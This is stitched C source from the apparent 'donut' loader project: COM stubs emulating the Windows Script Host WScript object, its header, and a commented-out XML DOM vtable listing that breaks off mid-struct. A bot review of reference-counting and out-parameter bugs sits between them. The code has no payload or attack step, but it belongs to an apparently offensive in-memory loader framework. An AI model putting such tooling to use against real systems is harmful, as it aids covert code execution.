163 HRESULT hr = iface->lpTypeInfo->lpVtbl->Invoke(
164 iface->lpTypeInfo, iface, dispIdMember, wFlags, pDispParams,
165 pVarResult, pExcepInfo, puArgErr);
166
167 DPRINT("HRESULT : %08lx", hr);
168
169 return hr;
170 }
171
172 // Returns the name of the WScript object (the host executable file).
173 static HRESULT WINAPI Host_get_Name(IHost *iface, BSTR *out_Name) {
174 DPRINT("WScript::Name");
175
176 return S_OK;
177 }
178
179 static HRESULT WINAPI Host_get_Application(IHost *iface, IDispatch **out_Dispatch) {
180 DPRINT("WScript::Application");
181
182 return E_NOTIMPL;
183 }
184
185 // Returns the fully qualified path of the host executable (CScript.exe or WScript.exe).
186 static HRESULT WINAPI Host_get_FullName(IHost *iface, BSTR *out_Path) {
187 DPRINT("WScript::FullName");
188
189 return E_NOTIMPL;
190 }
191
192 static HRESULT WINAPI Host_get_Path(IHost *iface, BSTR *out_Path) {
193 DPRINT("WScript::Path");
194
195 return E_NOTIMPL;
196 }
197
198 // Gets the script mode, or identifies the script mode.
199 static HRESULT WINAPI Host_get_Interactive(IHost *iface, VARIANT_BOOL *out_Interactive) {
200 DPRINT("WScript::get_Interactive");
201
202 return E_NOTIMPL;
203 }
204
205 // Sets the script mode, or identifies the script mode.
206 static HRESULT WINAPI Host_put_Interactive(IHost *iface, VARIANT_BOOL v) {
207 DPRINT("WScript::put_Interactive");
208
209 return E_NOTIMPL;
210 }
211
212 // Forces script execution to stop at any time.
213 static HRESULT WINAPI Host_Quit(IHost *iface, int ExitCode) {
214 DPRINT("WScript::Quit(%i)", ExitCode);
215
216 // if you know of a better way to do this..let me know.
217 iface->lpEngine->lpVtbl->InterruptScriptThread(iface->lpEngine, SCRIPTTHREADID_CURRENT, NULL, 0);
218
219 return S_OK;
220 }
221
222 // Returns the file name of the currently running script.
223 static HRESULT WINAPI Host_get_ScriptName(IHost *iface, BSTR *out_ScriptName) {
224 DPRINT("WScript::ScriptName");
225
226 return E_NOTIMPL;
227 }
228
229 // Returns the full path of the currently running script.
230 static HRESULT WINAPI Host_get_ScriptFullName(IHost *iface, BSTR *out_ScriptFullName) {
231 DPRINT("WScript::ScriptFullName");
232
233 return E_NOTIMPL;
234 }
235
236 // Returns the WshArguments object (a collection of arguments).
237 static HRESULT WINAPI Host_get_Arguments(
238 IHost *iface, void **out_Arguments) { // IArguments2
239 DPRINT("WScript::Arguments");
240
241 return E_NOTIMPL;
242 }
243
244 static HRESULT WINAPI Host_get_Version(IHost *iface, BSTR *out_Version) {
245 DPRINT("WScript::Version");
246
247 return E_NOTIMPL;
248 }
249
250 // Returns the Windows Script Host build version number.
251 static HRESULT WINAPI Host_get_BuildVersion(IHost *iface, int *out_Build) {
252 DPRINT("WScript::BuildVersion");
253
254 return E_NOTIMPL;
255 }
256
257 static HRESULT WINAPI Host_get_Timeout(IHost *iface, LONG *out_Timeout) {
258 DPRINT("WScript::get_Timeout");
259
260 return E_NOTIMPL;
261 }
262
263 static HRESULT WINAPI Host_put_Timeout(IHost *iface, LONG v) {
264 DPRINT("WScript::put_Timeout");
265
266 return E_NOTIMPL;
267 }
268
269 // Connects the object's event sources to functions with a given prefix.
270 static HRESULT WINAPI Host_CreateObject(IHost *iface, BSTR ProgID, BSTR Prefix,
271 IDispatch **out_Dispatch) {
272 DPRINT("WScript::CreateObject");
273
274 return E_NOTIMPL;
275 }
276
277 // Outputs text to either a message box or the command console window.
278 static HRESULT WINAPI Host_Echo(
279 IHost *iface, SAFEARRAY *args) {
280 DPRINT("WScript::Echo");
281
282 return E_NOTIMPL;
283 }
284
285 // Retrieves an existing object with the specified ProgID, or creates a new one from a file.
286 static HRESULT WINAPI Host_GetObject(
287 IHost *iface, BSTR Pathname, BSTR ProgID,
288 BSTR Prefix, IDispatch **out_Dispatch) {
289 DPRINT("WScript::GetObject");
290
291 return E_NOTIMPL;
292 }
293
294 // Disconnects a connected object's event sources.
295 static HRESULT WINAPI Host_DisconnectObject(
296 IHost *iface, IDispatch *Object) {
297 DPRINT("WScript::DisconnectObject");
298
299 return E_NOTIMPL;
300 }
301
302 // Suspends script execution for a specified length of time, then continues execution.
303 static HRESULT WINAPI Host_Sleep(
304 IHost *iface, LONG Time) {
305
306 DPRINT("WScript::Sleep");
307 iface->inst->api.Sleep((DWORD)Time);
308
309 return S_OK;
310 }
311
312 // Connects the object's event sources to functions with a given prefix.
313 static HRESULT WINAPI Host_ConnectObject(
314 IHost *iface, IDispatch *Object, BSTR Prefix) {
315 DPRINT("WScript::ConnectObject");
316
317 return E_NOTIMPL;
318 }
319
320 // Exposes the read-only input stream for the current script.
321 static HRESULT WINAPI Host_get_StdIn(
322 IHost *iface, void **ppts) { // ppts is ITextStream
323 DPRINT("WScript::StdIn");
324
325 return E_NOTIMPL;
326 }
327
328 // Exposes the write-only output stream for the current script.
329 static HRESULT WINAPI Host_get_StdOut(
330 IHost *iface, void **ppts) { // ppts is ITextStream
331 DPRINT("WScript::StdOut");
332
333 return E_NOTIMPL;
334 }
335
336 // Exposes the write-only error output stream for the current script.
337 static HRESULT WINAPI Host_get_StdErr(
338 IHost *iface, void **ppts) { // ppts is ITextStream
339 DPRINT("WScript::StdErr");
340
341 return E_NOTIMPL;
342 }
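Review bot: `Host_get_Name` (lines 173–177) returns `S_OK` without writing `*out_Name`, so a script reading `WScript.Name` receives whatever `BSTR` pointer the caller had in that slot and may later hand it to `SysFreeString`; every other unimplemented getter in this file returns `E_NOTIMPL`, so this one should either do the same or set the out-parameter explicitly, e.g. `if(out_Name == NULL) return E_POINTER; *out_Name = NULL; return E_NOTIMPL;`. `Host_GetTypeInfo` (line 134) ignores `iTInfo`, whereas the IDispatch contract requires `DISP_E_BADINDEX` for any value other than 0, so `if(iTInfo != 0) return DISP_E_BADINDEX;` belongs before the `AddRef` on line 139. `Host_AddRef` (lines 111–112) discards the value `_InterlockedIncrement` returns and re-reads `m_cRef` unsynchronised, which can report a stale count under concurrent `AddRef`/`Release`; `return _InterlockedIncrement(&iface->m_cRef);` mirrors what `Host_Release` already does on line 119. `Host_New` initialises only `m_cRef` and `inst` (lines 72–73), so if `LoadTypeLib` fails on line 77 then `lpTypeInfo` is never assigned and the dereferences on lines 139, 151 and 163 read an indeterminate pointer unless the caller zeroes the struct beforehand, which this file does not show; setting `host->lpTypeLib = NULL; host->lpTypeInfo = NULL;` at the top of `Host_New` and checking `lpTypeInfo` in those three methods would make the object safe regardless of how it was allocated.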
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef WSCRIPT_H
32 #define WSCRIPT_H
33
34 #include "../include/donut.h"
35
36 typedef struct _IHost IHost;
37
38 typedef struct _IHostVtbl {
39 BEGIN_INTERFACE
40
41 HRESULT (STDMETHODCALLTYPE *QueryInterface)(
42 IHost *This,
43 REFIID riid,
44 void **ppvObject);
45
46 ULONG (STDMETHODCALLTYPE *AddRef)(IHost *This);
47
48 ULONG (STDMETHODCALLTYPE *Release)(IHost *This);
49
50 HRESULT (STDMETHODCALLTYPE *GetTypeInfoCount)(
51 IHost *This,
52 UINT *pctinfo);
53
54 HRESULT (STDMETHODCALLTYPE *GetTypeInfo)(
55 IHost *This,
56 UINT iTInfo,
57 LCID lcid,
58 ITypeInfo **ppTInfo);
59
60 HRESULT (STDMETHODCALLTYPE *GetIDsOfNames)(
61 IHost *This,
62 REFIID riid,
63 LPOLESTR *rgszNames,
64 UINT cNames,
65 LCID lcid,
66 DISPID *rgDispId);
67
68 HRESULT (STDMETHODCALLTYPE *Invoke)(
69 IHost *This,
70 DISPID dispIdMember,
71 REFIID riid,
72 LCID lcid,
73 WORD wFlags,
74 DISPPARAMS *pDispParams,
75 VARIANT *pVarResult,
76 EXCEPINFO *pExcepInfo,
77 UINT *puArgErr);
78
79 HRESULT (STDMETHODCALLTYPE *get_Name)(
80 IHost *This,
81 BSTR *out_Name);
82
83 HRESULT (STDMETHODCALLTYPE *get_Application)(
84 IHost *This,
85 IDispatch **out_Dispatch);
86
87 HRESULT (STDMETHODCALLTYPE *get_FullName)(
88 IHost *This,
89 BSTR *out_Path);
90
91 HRESULT (STDMETHODCALLTYPE *get_Path)(
92 IHost *This,
93 BSTR *out_Path);
94
95 HRESULT (STDMETHODCALLTYPE *get_Interactive)(
96 IHost *This,
97 VARIANT_BOOL *out_Interactive);
98
99 HRESULT (STDMETHODCALLTYPE *put_Interactive)(
100 IHost *This,
101 VARIANT_BOOL v);
102
103 HRESULT (STDMETHODCALLTYPE *Quit)(
104 IHost *This,
105 int ExitCode);
106
107 HRESULT (STDMETHODCALLTYPE *get_ScriptName)(
108 IHost *This,
109 BSTR *out_ScriptName);
110
111 HRESULT (STDMETHODCALLTYPE *get_ScriptFullName)(
112 IHost *This,
113 BSTR *out_ScriptFullName);
114
115 HRESULT (STDMETHODCALLTYPE *get_Arguments)(
116 IHost *This,
117 void **out_Arguments);
118
119 HRESULT (STDMETHODCALLTYPE *get_Version)(
120 IHost *This,
121 BSTR *out_Version);
122
123 HRESULT (STDMETHODCALLTYPE *get_BuildVersion)(
124 IHost *This,
125 int *out_Build);
126
127 HRESULT (STDMETHODCALLTYPE *get_Timeout)(
128 IHost *This,
129 LONG *out_Timeout);
130
131 HRESULT (STDMETHODCALLTYPE *put_Timeout)(
132 IHost *This,
133 LONG v);
134
135 HRESULT (STDMETHODCALLTYPE *CreateObject)(
136 IHost *This,
137 BSTR ProgID,
138 BSTR Prefix,
139 IDispatch **out_Dispatch);
140
141 HRESULT (STDMETHODCALLTYPE *Echo)(
142 IHost *This,
143 SAFEARRAY *args);
144
145 HRESULT (STDMETHODCALLTYPE *GetObject)(
146 IHost *This,
147 BSTR Pathname,
148 BSTR ProgID,
149 BSTR Prefix,
150 IDispatch **out_Dispatch);
151
152 HRESULT (STDMETHODCALLTYPE *DisconnectObject)(
153 IHost *This,
154 IDispatch *Object);
155
156 HRESULT (STDMETHODCALLTYPE *Sleep)(
157 IHost *This,
158 LONG Time);
159
160 HRESULT (STDMETHODCALLTYPE *ConnectObject)(
161 IHost *This,
162 IDispatch *Object,
163 BSTR Prefix);
164
165 HRESULT (STDMETHODCALLTYPE *get_StdIn)(
166 IHost *This,
167 void **ppts);
168
169 HRESULT (STDMETHODCALLTYPE *get_StdOut)(
170 IHost *This,
171 void **ppts);
172
173 HRESULT (STDMETHODCALLTYPE *get_StdErr)(
174 IHost *This,
175 void **ppts);
176
177 END_INTERFACE
178 } IHostVtbl;
179
180 typedef struct _IHost {
181 IHostVtbl *lpVtbl; // virtual function table
182 ITypeLib *lpTypeLib; // type library
183 ITypeInfo *lpTypeInfo; // type information for WScript properties/methods
184 IActiveScript *lpEngine; // IActiveScript engine from main thread
185 ULONG m_cRef; // reference count
186 PDONUT_INSTANCE inst;
187 } IHost;
188
189 static HRESULT Host_New(PDONUT_INSTANCE inst, IHost *host);
190
191 // Queries a COM object for a pointer to one of its interface.
192 static STDMETHODIMP Host_QueryInterface(IHost *This, REFIID riid, void **ppv);
193
194 // Increments the reference count for an interface pointer to a COM object.
195 static STDMETHODIMP_(ULONG) Host_AddRef(IHost *This);
196
197 // Decrements the reference count for an interface on a COM object.
198 static STDMETHODIMP_(ULONG) Host_Release(IHost *This);
199
200 // Retrieves the number of type information interfaces that an object provides (either 0 or 1).
201 static STDMETHODIMP Host_GetTypeInfoCount(IHost *This, UINT *pctinfo);
202
203 // Retrieves the type information for an object, which can then be used to get the type information for an interface.
204 static STDMETHODIMP Host_GetTypeInfo(IHost *This, UINT iTInfo, LCID lcid, ITypeInfo **ppTInfo);
205
206 // Maps a single member and an optional set of argument names to a corresponding set of integer DISPIDs,
207 // which can be used on subsequent calls to Invoke.
208 static STDMETHODIMP Host_GetIDsOfNames(
209 IHost *This, REFIID riid, LPOLESTR *rgszNames,
210 UINT cNames, LCID lcid, DISPID *rgDispId);
211
212 // Provides access to properties and methods exposed by an object.
213 // The dispatch function DispInvoke provides a standard implementation of Invoke.
214 static STDMETHODIMP Host_Invoke(
215 IHost *This, DISPID dispIdMember, REFIID riid,
216 LCID lcid, WORD wFlags, DISPPARAMS *pDispParams, VARIANT *pVarResult,
217 EXCEPINFO *pExcepInfo, UINT *puArgErr);
218
219 // Returns the name of the WScript object (the host executable file).
220 static STDMETHODIMP Host_get_Name(IHost *This, BSTR *out_Name);
221
222 static STDMETHODIMP Host_get_Application(IHost *This, IDispatch **out_Dispatch);
223
224 // Returns the fully qualified path of the host executable (CScript.exe or WScript.exe).
225 static STDMETHODIMP Host_get_FullName(IHost *This, BSTR *out_Path);
226
227 static STDMETHODIMP Host_get_Path(IHost *This, BSTR *out_Path);
228
229 // Gets the script mode, or identifies the script mode.
230 static STDMETHODIMP Host_get_Interactive(IHost *This, VARIANT_BOOL *out_Interactive);
231
232 // Sets the script mode, or identifies the script mode.
233 static STDMETHODIMP Host_put_Interactive(IHost *This, VARIANT_BOOL v);
234
235 // Forces script execution to stop at any time.
236 static STDMETHODIMP Host_Quit(IHost *This, int ExitCode);
237
238 // Returns the file name of the currently running script.
239 static STDMETHODIMP Host_get_ScriptName(IHost *This, BSTR *out_ScriptName);
240
241 // Returns the full path of the currently running script.
242 static STDMETHODIMP Host_get_ScriptFullName(IHost *This, BSTR *out_ScriptFullName);
243
244 // Returns the WshArguments object (a collection of arguments).
245 static STDMETHODIMP Host_get_Arguments(IHost *This, void **out_Arguments);
246
247 static STDMETHODIMP Host_get_Version(IHost *This, BSTR *out_Version);
248
249 // Returns the Windows Script Host build version number.
250 static STDMETHODIMP Host_get_BuildVersion(IHost *This, int *out_Build);
251
252 static STDMETHODIMP Host_get_Timeout(IHost *This, LONG *out_Timeout);
253
254 static STDMETHODIMP Host_put_Timeout(IHost *This, LONG v);
255
256 // Connects the object's event sources to functions with a given prefix.
257 static STDMETHODIMP Host_CreateObject(IHost *This, BSTR ProgID, BSTR Prefix, IDispatch **out_Dispatch);
258
259 // Outputs text to either a message box or the command console window.
260 static STDMETHODIMP Host_Echo(IHost *This, SAFEARRAY *args);
261
262 // Retrieves an existing object with the specified ProgID, or creates a new one from a file.
263 static STDMETHODIMP Host_GetObject(IHost *This, BSTR Pathname, BSTR ProgID, BSTR Prefix, IDispatch **out_Dispatch);
264
265 // Disconnects a connected object's event sources.
266 static STDMETHODIMP Host_DisconnectObject(IHost *This, IDispatch *Object);
267
268 // Suspends script execution for a specified length of time, then continues execution.
269 static STDMETHODIMP Host_Sleep(IHost *This, LONG Time);
270
271 // Connects the object's event sources to functions with a given prefix.
272 static STDMETHODIMP Host_ConnectObject(IHost *This, IDispatch *Object, BSTR Prefix);
273
274 // Exposes the read-only input stream for the current script.
275 static STDMETHODIMP Host_get_StdIn(IHost *This, void **ppts);
276
277 // Exposes the write-only output stream for the current script.
278 static STDMETHODIMP Host_get_StdOut(IHost *This, void **ppts);
279
280 // Exposes the write-only error output stream for the current script.
281 static STDMETHODIMP Host_get_StdErr(IHost *This, void **ppts);
282
283 #endif
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 /**
32 typedef struct IXMLDOMNodeVtbl {
33 BEGIN_INTERFACE
34
35 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
36 IXMLDOMNode * This,
37 REFIID riid,
38 void **ppvObject);
39
40 ULONG ( STDMETHODCALLTYPE *AddRef )(
41 IXMLDOMNode * This);
42
43 ULONG ( STDMETHODCALLTYPE *Release )(
44 IXMLDOMNode * This);
45
46 HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )(
47 IXMLDOMNode * This,
48 UINT *pctinfo);
49
50 HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )(
51 IXMLDOMNode * This,
52 UINT iTInfo,
53 LCID lcid,
54 ITypeInfo **ppTInfo);
55
56 HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )(
57 IXMLDOMNode * This,
58 REFIID riid,
59 LPOLESTR *rgszNames,
60 UINT cNames,
61 LCID lcid,
62 DISPID *rgDispId);
63
64 HRESULT ( STDMETHODCALLTYPE *Invoke )(
65 IXMLDOMNode * This,
66 DISPID dispIdMember,
67 REFIID riid,
68 LCID lcid,
69 WORD wFlags,
70 DISPPARAMS *pDispParams,
71 VARIANT *pVarResult,
72 EXCEPINFO *pExcepInfo,
73 UINT *puArgErr);
74
75 HRESULT ( STDMETHODCALLTYPE *get_nodeName )(
76 IXMLDOMNode * This,
77 BSTR *name);
78
79 HRESULT ( STDMETHODCALLTYPE *get_nodeValue )(
80 IXMLDOMNode * This,
81 VARIANT *value);
82
83 HRESULT ( STDMETHODCALLTYPE *put_nodeValue )(
84 IXMLDOMNode * This,
85 VARIANT value);
86
87 HRESULT ( STDMETHODCALLTYPE *get_nodeType )(
88 IXMLDOMNode * This,
89 DOMNodeType *type);
90
91 HRESULT ( STDMETHODCALLTYPE *get_parentNode )(
92 IXMLDOMNode * This,
93 IXMLDOMNode **parent);
94
95 HRESULT ( STDMETHODCALLTYPE *get_childNodes )(
96 IXMLDOMNode * This,
97 IXMLDOMNodeList **childList);
98
99 HRESULT ( STDMETHODCALLTYPE *get_firstChild )(
100 IXMLDOMNode * This,
101 IXMLDOMNode **firstChild);
102
103 HRESULT ( STDMETHODCALLTYPE *get_lastChild )(
104 IXMLDOMNode * This,
105 IXMLDOMNode **lastChild);
106
107 HRESULT ( STDMETHODCALLTYPE *get_previousSibling )(
108 IXMLDOMNode * This,
109 IXMLDOMNode **previousSibling);
110
111 HRESULT ( STDMETHODCALLTYPE *get_nextSibling )(
112 IXMLDOMNode * This,
113 IXMLDOMNode **nextSibling);
114
115 HRESULT ( STDMETHODCALLTYPE *get_attributes )(
116 IXMLDOMNode * This,
117 IXMLDOMNamedNodeMap **attributeMap);
118
119 HRESULT ( STDMETHODCALLTYPE *insertBefore )(
120 IXMLDOMNode * This,
121 IXMLDOMNode *newChild,
122 VARIANT refChild,
123 IXMLDOMNode **outNewChild);
124
125 HRESULT ( STDMETHODCALLTYPE *replaceChild )(
126 IXMLDOMNode * This,
127 IXMLDOMNode *newChild,
128 IXMLDOMNode *oldChild,
129 IXMLDOMNode **outOldChild);
130
131 HRESULT ( STDMETHODCALLTYPE *removeChild )(
132 IXMLDOMNode * This,
133 IXMLDOMNode *childNode,
134 IXMLDOMNode **oldChild);
135
136 HRESULT ( STDMETHODCALLTYPE *appendChild )(
137 IXMLDOMNode * This,
138 IXMLDOMNode *newChild,
139 IXMLDOMNode **outNewChild);
140
141 HRESULT ( STDMETHODCALLTYPE *hasChildNodes )(
142 IXMLDOMNode * This,
143 VARIANT_BOOL *hasChild);
144
145 HRESULT ( STDMETHODCALLTYPE *get_ownerDocument )(
146 IXMLDOMNode * This,
147 IXMLDOMDocument **XMLDOMDocument);
148
149 HRESULT ( STDMETHODCALLTYPE *cloneNode )(
150 IXMLDOMNode * This,
151 VARIANT_BOOL deep,
152 IXMLDOMNode **cloneRoot);
153
154 HRESULT ( STDMETHODCALLTYPE *get_nodeTypeString )(
155 IXMLDOMNode * This,
156 BSTR *nodeType);
157
158 HRESULT ( STDMETHODCALLTYPE *get_text )(
159 IXMLDOMNode * This,
160 BSTR *text);
161
162 HRESULT ( STDMETHODCALLTYPE *put_text )(
163 IXMLDOMNode * This,
164 BSTR text);
165
166 HRESULT ( STDMETHODCALLTYPE *get_specified )(
167 IXMLDOMNode * This,
168 VARIANT_BOOL *isSpecified);
169
170 HRESULT ( STDMETHODCALLTYPE *get_definition )(
171 IXMLDOMNode * This,
172 IXMLDOMNode **definitionNode);
173
174 HRESULT ( STDMETHODCALLTYPE *get_nodeTypedValue )(
175 IXMLDOMNode * This,
176 VARIANT *typedValue);
177
178 HRESULT ( STDMETHODCALLTYPE *put_nodeTypedValue )(
179 IXMLDOMNode * This,
180 VARIANT typedValue);
181
182 HRESULT ( STDMETHODCALLTYPE *get_dataType )(
183 IXMLDOMNode * This,
184 VARIANT *dataTypeName);
185
186 HRESULT ( STDMETHODCALLTYPE *put_dataType )(
187 IXMLDOMNode * This,
188 BSTR dataTypeName);
189
190 HRESULT ( STDMETHODCALLTYPE *get_xml )(
191 IXMLDOMNode * This,
192 BSTR *xmlString);
193
194 HRESULT ( STDMETHODCALLTYPE *transformNode )(
195 IXMLDOMNode * This,
196 IXMLDOMNode *stylesheet,
197 BSTR *xmlString);
198
199 HRESULT ( STDMETHODCALLTYPE *selectNodes )(
200 IXMLDOMNode * This,
201 BSTR queryString,
202 IXMLDOMNodeList **resultList);
203
204 HRESULT ( STDMETHODCALLTYPE *selectSingleNode )(
205 IXMLDOMNode * This,
206 BSTR queryString,
207 IXMLDOMNode **resultNode);
208
209 HRESULT ( STDMETHODCALLTYPE *get_parsed )(
210 IXMLDOMNode * This,
211 VARIANT_BOOL *isParsed);
212
213 HRESULT ( STDMETHODCALLTYPE *get_namespaceURI )(
214 IXMLDOMNode * This,
215 BSTR *namespaceURI);
216
217 HRESULT ( STDMETHODCALLTYPE *get_prefix )(
218 IXMLDOMNode * This,
219 BSTR *prefixString);
220
221 HRESULT ( STDMETHODCALLTYPE *get_baseName )(
222 IXMLDOMNode * This,
223 BSTR *nameString);
224
225 HRESULT ( STDMETHODCALLTYPE *transformNodeToObject )(
226 IXMLDOMNode * This,
227 IXMLDOMNode *stylesheet,
228 VARIANT outputObject);
229
230 END_INTERFACE
231 } IXMLDOMNodeVtbl;
232
233 typedef struct _IXMLDOMNode {
234 IXMLDOMNodeVtbl *lpVtbl;
235 } XMLDOMNode;
236
237 typedef struct IXMLDOMDocumentVtbl {
238 BEGIN_INTERFACE
239
240 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
241 IXMLDOMDocument * This,
242 REFIID riid,
243
244 __RPC__deref_out void **ppvObject);
245
246 ULONG ( STDMETHODCALLTYPE *AddRef )(
247 IXMLDOMDocument * This);
248
249 ULONG ( STDMETHODCALLTYPE *Release )(
250 IXMLDOMDocument * This);
251
252 HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )(
253 IXMLDOMDocument * This,
254 UINT *pctinfo);
255
256 HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )(
257 IXMLDOMDocument * This,
258 UINT iTInfo,
259 LCID lcid,
260 ITypeInfo **ppTInfo);
261
262 HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )(
263 IXMLDOMDocument * This,
264 REFIID riid,
265 LPOLESTR *rgszNames,
266 UINT cNames,
267 LCID lcid,
268 DISPID *rgDispId);
269
270 HRESULT ( STDMETHODCALLTYPE *Invoke )(
271 IXMLDOMDocument * This,
272 DISPID dispIdMember,
273 REFIID riid,
274 LCID lcid,
275 WORD wFlags,
276 DISPPARAMS *pDispParams,
277 VARIANT *pVarResult,
278 EXCEPINFO *pExcepInfo,
279 UINT *puArgErr);
280
281 HRESULT ( STDMETHODCALLTYPE *get_nodeName )(
282 IXMLDOMDocument * This,
283 BSTR *name);
284
285 HRESULT ( STDMETHODCALLTYPE *get_nodeValue )(
286 IXMLDOMDocument * This,
287 VARIANT *value);
288
289 HRESULT ( STDMETHODCALLTYPE *put_nodeValue )(
290 IXMLDOMDocument * This,
291 VARIANT value);
292
293 HRESULT ( STDMETHODCALLTYPE *get_nodeType )(
294 IXMLDOMDocument * This,
295 DOMNodeType *type);
296
297 HRESULT ( STDMETHODCALLTYPE *get_parentNode )(
298 IXMLDOMDocument * This,
299 IXMLDOMNode **parent);
300
301 HRESULT ( STDMETHODCALLTYPE *get_childNodes )(
302 IXMLDOMDocument * This,
303 IXMLDOMNodeList **childList);
304
305 HRESULT ( STDMETHODCALLTYPE *get_firstChild )(
306 IXMLDOMDocument * This,
307 IXMLDOMNode **firstChild);
308
309 HRESULT ( STDMETHODCALLTYPE *get_lastChild )(
310 IXMLDOMDocument * This,
311 IXMLDOMNode **lastChild);
312
313 HRESULT ( STDMETHODCALLTYPE *get_previousSibling )(
314 IXMLDOMDocument * This,
315 IXMLDOMNode **previousSibling);
316
317 HRESULT ( STDMETHODCALLTYPE *get_nextSibling )(
318 IXMLDOMDocument * This,
319 IXMLDOMNode **nextSibling);
320
321 HRESULT ( STDMETHODCALLTYPE *get_attributes )(
322 IXMLDOMDocument * This,
323 IXMLDOMNamedNodeMap **attributeMap);
324
325 HRESULT ( STDMETHODCALLTYPE *insertBefore )(
326 IXMLDOMDocument * This,
327 IXMLDOMNode *newChild,
328 VARIANT refChild,
329 IXMLDOMNode **outNewChild);
330
331 HRESULT ( STDMETHODCALLTYPE *replaceChild )(
332 IXMLDOMDocument * This,
333 IXMLDOMNode *newChild,
334 IXMLDOMNode *oldChild,
335 IXMLDOMNode **outOldChild);
336
337 HRESULT ( STDMETHODCALLTYPE *removeChild )(
338 IXMLDOMDocument * This,
339 IXMLDOMNode *childNode,
340 IXMLDOMNode **oldChild);
341
342 HRESULT ( STDMETHODCALLTYPE *appendChild )(
343 IXMLDOMDocument * This,
344 IXMLDOMNode *newChild,
345 IXMLDOMNode **outNewChild);
346
347 HRESULT ( STDMETHODCALLTYPE *hasChildNodes )(
348 IXMLDOMDocument * This,
349 VARIANT_BOOL *hasChild);
350
351 HRESULT ( STDMETHODCALLTYPE *get_ownerDocument )(
352 IXMLDOMDocument * This,
353 IXMLDOMDocument **XMLDOMDocument);
354
355 HRESULT ( STDMETHODCALLTYPE *cloneNode )(
356 IXMLDOMDocument * This,
357 VARIANT_BOOL deep,
358 IXMLDOMNode **cloneRoot);
359
360 HRESULT ( STDMETHODCALLTYPE *get_nodeTypeString )(
361 IXMLDOMDocument * This,
362 BSTR *nodeType);
363
364 HRESULT ( STDMETHODCALLTYPE *get_text )(
365 IXMLDOMDocument * This,
366 BSTR *text);
367
368 HRESULT ( STDMETHODCALLTYPE *put_text )(
369 IXMLDOMDocument * This,
370 BSTR text);
371
372 HRESULT ( STDMETHODCALLTYPE *get_specified )(
373 IXMLDOMDocument * This,
374 VARIANT_BOOL *isSpecified);
375
376 HRESULT ( STDMETHODCALLTYPE *get_definition )(
377 IXMLDOMDocument * This,
378 IXMLDOMNode **definitionNode);
379
380 HRESULT ( STDMETHODCALLTYPE *get_nodeTypedValue )(
381 IXMLDOMDocument * This,
382 VARIANT *typedValue);
383
384 HRESULT ( STDMETHODCALLTYPE *put_nodeTypedValue )(
385 IXMLDOMDocument * This,
386 VARIANT typedValue);
387
388 HRESULT ( STDMETHODCALLTYPE *get_dataType )(
389 IXMLDOMDocument * This,
390 VARIANT *dataTypeName);
391
392 HRESULT ( STDMETHODCALLTYPE *put_dataType )(
393 IXMLDOMDocument * This,
394 BSTR dataTypeName);
395
396 HRESULT ( STDMETHODCALLTYPE *get_xml )(
397 IXMLDOMDocument * This,
398 BSTR *xmlString);
399
